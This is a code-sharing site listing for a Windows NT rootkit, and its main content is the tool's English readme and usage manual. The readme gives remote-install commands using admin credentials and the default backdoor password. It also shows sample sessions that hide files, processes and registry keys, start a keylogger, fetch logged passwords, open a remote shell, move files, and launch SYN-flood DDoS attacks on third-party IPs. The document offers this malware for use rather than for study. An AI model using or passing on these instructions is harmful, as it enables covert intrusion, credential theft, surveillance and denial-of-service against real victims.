nt_rootkit
所属分类:其他
开发工具:Visual C++
文件大小:11KB
下载次数:63
上传日期:2007-04-23 15:47:12
上 传 者:
alyo
说明: 国外rootkit成员写的NT_rootkit源代码.
(abroad rootkit NT_rootkit written by the members of the source code.)
yyt_hac's ntrootkit 1.1 Readme
The first thing you should know about this rootkit is that the built-in
backdoor can communicate
with the client in 4 ways (0:Userdefined,1:Icmp,2:Udp,3:Tcp). these are all
connectionless so
using a utility like fport.exe will not show a connection since there isnt
one. TCP and UDP are
the most reliable.
Also of importance is that the defautl password is yyt_hac . This can and
should be changed but
for connecting to the backdoor for the first time it must be used.
-Local Installation and Commandline Options
C:\WINNT\system32>ntrootkit -h
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Usage:ntrootkit \\ip -u username -p password
ip the computer you want to install ntrootkit on
-u [username] admin account on remote computer
-p [password] admin password on remote computer
Usage:ntrootkit [-v/-m/-u [password]/-i [password]]
-v show the ntrootkit version that is installed
-u [password] uninstall the ntrootkit
-i [password] update the ntrootkit, the new version will be run after
reboot
-m show the work mode of the ntrootkit
-m [workmode] set the workmore of the rootkit (0=sniffer, 1=driver)
C:\WINNT>ntrootkit //local install, run without any options
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Exacting files.....ok
Installing service..ok
Starting up The Ntrootkit..ok
The Ntrootkit is installed and started successfully!
C:\WINNT>ntrootkit -m
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
The ntrootkit is using windows 2000 sniffer mode to recv packet
//This mode is not very stable, driver is highly reccommended
C:\WINNT\>ntrootkit -v
ntrootkit -v
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
The Version of Ntrootkit that is installed is 1.1
C:\WINNT\system32>ntrootkit -i [password] //update rootkit
ntrootkit -i
yyt_hac
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Please enter you password:
Please wait a minute.....
Update successfully,the new version very runs after system reboots!
-Remote Installation
F:\letmein>ntrootkit \\202.38.*.* -u administrator -p 123456
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Connecting to remote computer...ok
Exacting files.....ok
Installing service..ok
Starting up The Ntrootkit..ok
Disconnecting...ok
The Ntrootkit is installed and started successfully!
-Backdoor
L:\c\rootkit\44\RTCLIENT\Release>rtclient
It is yyt_hac's ntrootkit client 1.1
Welcome to http://www.yythac.com
usage:rtclient destip [-p password] [-t proto] [-o port] [-y icmp_type]
[-d icmp_code] [-m MTU] [-c Command]
destip-------------The computer you want to connect
password-----------The ntrootkit's password
proto--------------The proto that ntrootkit will
use(0:userdefined,1:icmp,2:udp,3:tcp)
port---------------The dest udp or tcp port which send packet to (default
is 445)
MTU----------------The MAX packet size the ntrootkit will use to send
packet(if not provided ,the program will get it automatically )
icmp_type----------The icmp packet type which send to server,default is
ICMP_ECHO REPLY
icmp_code----------The icmp packet code which send to server,default is 0
Command------------The command which you want the server to do
The DDos command usage:DDOS DDos_Destip [DDos_Destport DDos_type
DDos_seconds DDos_ProcCount]
DDos_Destip--------The computer you want to DDos
DDos_Destport------The Destport you want to DDos (default is 445)
DDos_type----------The DDos type you want to use (0:ping flood,1:udp
flood,2:synflood,3:mstream flood,default is 0)
DDos_seconds-------The seconds you want to DDos the dest (default is 150s)
DDos_ProcCount-----The process count which the server use to ddos (default
is 10)
//the only required commandline options are destip and password, others
have default values
L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3
It is yyt_hac's ntrootkit client 1.0
Welcome to http://www.yythac.com
Getting ip address of the computer...
1. 1.1.1.89
2. 1.1.1.200
Please Select the number of the ip address you want to use to send and recv
packet:1
Time out,Please make sure the target is up and try again
//if the default port of 445 does not work, try another with the -o option
L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3 -o 139
It is yyt_hac's ntrootkit client 1.1
Welcome to http://www.yythac.com
Getting ip address of the computer...
1. 1.1.1.89
2. 1.1.1.200
Please Select the number of the ip address you want to use to send and recv
packet:1
Welcome to yyt_hac's ntrootkit Server 1.0,use '?' command to get command
list
CMD>?
********yyt_hac's ntrootkit Server Command List********
?-------------------------------Show this list
HideFileDir [FileName or DIR]----------------------Hide the file or
directory
HideProcId [pid]----------------Hide process with the id
HideProcName [procname]---------Hide process with the process name
HideKey [KeyName]---------------Hide a registry key
HideValue [ValueName]-----------Hide a registry value
HideUser [UserName]-------------Hide a User
HideServ [ServiceName]----------Hide a Service
ShowFileDir FileName or DIR-----UnHide the file or directory that been
hidden before
ShowProcId pid------------------UnHide the process that been hidden before
with the id
ShowProcName procname-----------UnHide the process that been hidden before
with the process name
ShowKey KeyName-----------------UnHide the registry key
ShowValue ValueName-------------UnHide the registry value
ShowUser UserName---------------UnHide the user that been hidden before
ShowServ ServiceName------------UnHide the service that been hidden before
Get RemoteFilePath [LocalFilePath]----Get the remote file to local computer
Put LocalFilePath [RemoteFilePath]----Put the local file to remote computer
KeyLogOn------------------------------Start key log
KeyLogOff-----------------------------Stop key log
DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds
DDos_ProcCount]---DDos the destip
SDDOS---------------------------------Stop DDos
GetPwd [LocalFilePath]----------------Get the ntrootkit keylog password
file to local computer
DelPwd--------------------------------Del the ntrootkit keylog password
file
Ps------------------------------------Show all processes on remote machine
Kill pid------------------------------Kill the process with the id or name
RTVer---------------------------------Show Ntrootkit server version and
author info
SetPass [NewPassword]-----------------Change or show the connection
password
Reboot--------------------------------Reboot the targer computer
OpenShell-----------------------------Open a command shell
Exit----------------------------------Exit the shell or rootkit
//notes
HideKey,HideServ,etc Call any Hide* command without a
parameter to see a list
of currently hidden items
HideUser [UserName]-------------------Not implemented yet
HideServ [ServiceName]----------------Hide a service by service name NOT
display name
CMD>ps //list processes, including hidden
ProcessID ProcessName
0 [System Process]
8 System
176 smss.exe
200 csrss.exe
224 WINLOGON.EXE
252 services.exe
2*** LSASS.EXE
452 svchost.exe
508 spoolsv.exe
536 NETDDE.EXE
13*** ntfrs.exe
1392 NTservice.exe
1404 NTweb.exe
1412 CCP.exe
1900 termsrv.exe
1952 winmgmt.exe
1968 winvnc.exe
1992 dns.exe
2032 inetinfo.exe
2076 ismserv.exe
2512 explorer.exe
2720 internat.exe
2728 sqlmangr.exe
2652 plog.exe
2624 SysArchive.exe
2752 svchost.exe
3160 DWRCS.EXE
11544 SpntSvc.exe
23028 CCProxy.exe
27096 mshta.exe
27***0 PSEXESVC.EXE
28008 cmd.exe
27872 rtkit.exe
CMD>kill 27096
process is been killed !
CMD>rtver
The ntrootkit version is 1.1,
welcome to http://www.yythac.com
CMD>hideprocid //list hidden processes
The Hide ProcId:
CMD>keylogon //start keylogger
Key log Start successfully
CMD>ddos 202.202.23.3.14 139 2 30 //DOS 202.23.3.14 with a
syn flood on port 139 for 30sec
DDos dip:202.23.3.14,DDos dport:139,DDos type:2,DDos seconds:30,DDos
process count:10,
DDos started successfully!
CMD>ddos 202.23.3.14 139 2 30 //can only do one dos at at
a time
DDos already started
CMD>sddos //stop running dos attack
Stop DDos sucessfully!
CMD>openshell //windows commandshell
Microsoft Windows 2000 [版本 5.00.2195]
(C) Copyright 1***5-2000 Microsoft Corp.
C:\WINNT\system32>hideprocid //1500 is the commmandshell procid,it will add to
hidden list automatically,and will be delete after exit
The Hide ProcId:
1500
C:\WINNT\system32>cd \
cd \
C:\>dir/w
dir/w
磁碟區 C 中的磁碟沒有標籤。
磁碟區序號: B472-5102
目錄: C:\
89.bat Ad1nt40.zip ADMIN.CSV
ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV
BHP015.IN_ [chenhu2] DNSMGMT.MS_
[Documents and Settings] [FASROOT] [ie]
[Inetpub] logfile.txt MD56KVCDRV.exe
[MSSQL7] PARSER.IN_ PDOXUSRS.NET
[Program Files] ququ ra_slave.log
sql [Tappupdate] TEMP.SYS
[test] tsc.zip WARRING.txt
[WINNT] 新建 文本文?.txt
19 個檔案 3,586,720 位元組
10 個目錄 1,213,169,6*** 位元組可用
C:\>hidefiledir *logfile.txt //hide the file the ends with or is called
logfile.txt
HideFileDir:successfully
C:\>dir/w
dir/w
磁碟區 C 中的磁碟沒有標籤。
磁碟區序號: B472-5102
目錄: C:\
89.bat Ad1nt40.zip ADMIN.CSV
ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV
BHP015.IN_ [chenhu2] DNSMGMT.MS_
[Documents and Settings] [FASROOT] [ie]
[Inetpub] MD56KVCDRV.exe [MSSQL7]
PARSER.IN_ PDOXUSRS.NET [Program Files]
ququ ra_slave.log sql
[Tappupdate] TEMP.SYS [test]
tsc.zip WARRING.txt [WINNT]
新建 文本文?.txt
18 個檔案 3,586,582 位元組
10 個目錄 1,213,169,6*** 位元組可用
C:\>hidefiledir //file was hidden successfully, not in list above
The Hide File or Dir:
*LOGFILE.TXT
C:\>showfiledir *logfile.txt //unhide *logfile.txt
ShowFileDir:successfully
C:\>showfiledir *logfile.txt
ShowFileDir:already hidden or not found
C:\>dir/w //there is is again
dir/w
磁碟區 C 中的磁碟沒有標籤。
磁碟區序號: B472-5102
目錄: C:\
89.bat Ad1nt40.zip ADMIN.CSV
ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV
BHP015.IN_ [chenhu2] DNSMGMT.MS_
[Documents and Settings] [FASROOT] [ie]
[Inetpub] logfile.txt MD56KVCDRV.exe
[MSSQL7] PARSER.IN_ PDOXUSRS.NET
[Program Files] ququ ra_slave.log
sql [Tappupdate] TEMP.SYS
[test] tsc.zip WARRING.txt
[WINNT] 新建 文本文?.txt
19 個檔案 3,586,720 位元組
10 個目錄 1,213,169,6*** 位元組可用
C:\>get tsc.zip //file must exist
Can't open file
C:\>get c:\tsc.zip d:\zips\tsc.zip //download c:\tsc.zip to
d:\zips\tsc.zip
................................................................................
................................................................................
..................Get file sucssesfully!
C:\>put c:\logfile.txt c:\f.txt //upload c:\logfile.txt to c:\f.txt
.....Put file successfully!
C:\>dir/w
dir/w
磁碟區 C 中的磁碟沒有標籤。
磁碟區序號: B472-5102
目錄: C:\
89.bat Ad1nt40.zip ADMIN.CSV
ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV
BHP015.IN_ [chenhu2] DNSMGMT.MS_
[Documents and Settings] f.txt [FASROOT]
[ie] [Inetpub] logfile.txt
MD56KVCDRV.exe [MSSQL7] PARSER.IN_
PDOXUSRS.NET [Program Files] ququ
ra_slave.log sql [Tappupdate]
TEMP.SYS [test] tsc.zip
WARRING.txt [WINNT] 新建 文本文?.txt
20 個檔案 3,593,221 位元組
10 個目錄 1,213,161,472 位元組可用
C:\>del f.txt
del f.txt
C:\>exit //exit shell, back to backdoor main
CMD>exit //exit backdoor
exit successfully
bye bye
F:\letmein>
1. If you and the target machine do not have an external address then you
can only
use tcp/udp protocol for the backdoor but you may still specifiy a
different port.
2. Since the backdoor is connectionless you must piggyback on an existing
open port
like those below :
UDP - 445,137,138,500,4000,53,etc
TCP - 445,139,80,21,23,135,53,etc
3. Backdoor client and rootkit on the same machine cannot communicate.
Meaning trying
to connect to localhost using the client will not work.
4. Machines with valid external ips can use TCP/UDP/ICMP , TCP/UDP are
reccommended
unless the machine is locked up tight but pings can get through in which
case ICMP
be the best choice.
5. If you do not exit the backdoor properly, with exit command, then wait a
few minutes
before reconnecting.
6. If you use the sniffer working mode the backdoor can be unreachable with
high network
traffic volume, use at your judgement.
7. Do no forget to change the rootkit pasword with the SetPass command,
default is yyt_hac.
8. Use corresponding clients and roorkit versions, backwards and forwards
compatibility
is not guaranteed.
-Thank to Joe Warshaw for this english readme
Web:http://www.yythac.com
Email:webmaster@yythac.com
QQ:47090005
icq:272288117
近期下载者:
相关文件:
收藏者: